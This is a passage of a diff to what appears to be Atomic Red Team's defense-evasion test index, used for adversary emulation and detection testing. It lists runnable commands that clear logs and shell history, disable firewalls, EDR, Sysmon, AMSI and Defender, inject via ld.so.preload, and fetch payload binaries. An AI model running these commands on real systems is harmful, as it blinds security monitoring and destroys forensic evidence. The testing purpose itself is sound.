of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero -' + ' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions -' + ' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file -' + ' supported_platforms: - linux - macos @@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -' + ' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting -' + ' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname -' + ' cleanup_command: 'userdel -f testuser1 -' + ' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history -' + ' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing -' + ' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history -' + ' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath -' + ' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs -' + ' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} -' + ' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} -' + ' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. -' + ' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} -' + ' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1553.002: technique: external_references: @@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} -' + ' cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} -' + ' executor: command: 'Invoke-Expression #{input_file} -' + ' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | gcc #{input_file} && ./a.out @@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: 'go run #{input_file} -' + ' name: bash T1218.001: technique: @@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) -' + ' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} -' + ' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} -' + ' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) -' + ' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} -' + ' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1578.003: @@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) -' + ' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present -' + ' prereq_command: 'which python3 -' + ' get_prereq_command: 'echo "Please install Python 3" -' + ' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present -' + ' prereq_command: 'which perl -' + ' get_prereq_command: 'echo "Please install Perl" -' + ' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present -' + ' prereq_command: 'which xxd -' + ' get_prereq_command: 'echo "Please install xxd" -' + ' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail -' + ' supported_platforms: - iaas:aws input_arguments: @@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true -' + ' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false -' + ' cleanup_command: 'wevtutil sl "#{log_name}" /e:true -' + ' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off -' + ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 -' + ' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f -' + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 -' + ' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw disable -' + ' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'systemctl stop ufw -' + ' cleanup_command: | systemctl start ufw systemctl status ufw @@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw logging off -' + ' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules -' + ' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. -' + ' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw -' + ' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. -' + ' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log -' + ' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection -' + ' supported_platforms: - linux input_arguments: @@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service -' + ' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement -' + ' supported_platforms: - linux executor: command: 'setenforce 0 -' + ' cleanup_command: 'setenforce 1 -' + ' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux -' + ' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response -' + ' supported_platforms: - macos executor: @@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper -' + ' supported_platforms: - macos executor: command: 'sudo spctl --master-disable -' + ' cleanup_command: 'sudo spctl --master-enable -' + ' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS -' + ' supported_platforms: - macos input_arguments: @@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded -' + ' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed -' + ' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded -' + ' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} -' + ' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion -' + ' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available -' + ' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed -' + ' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} -' + ' get_prereq_command: 'cmd /c sysmon -i -accepteula -' + ' executor: command: 'sysmon -u -' + ' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -' + ' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null -' + ' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -' + ' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -' + ' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -' + ' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. -' + ' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. -' + ' supported_platforms: - windows input_arguments: @@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. -' + ' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed -' + ' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory -' + ' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} -' + ' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it -' + ' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} -' + ' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it -' + ' supported_platforms: - linux input_arguments: @@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} -' + ' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} -' + ' executor: command: 'del /f #{file_to_delete} -' + ' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'mkdir #{folder_to_delete} -' + ' executor: command: 'rmdir /s /q #{folder_to_delete} -' + ' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 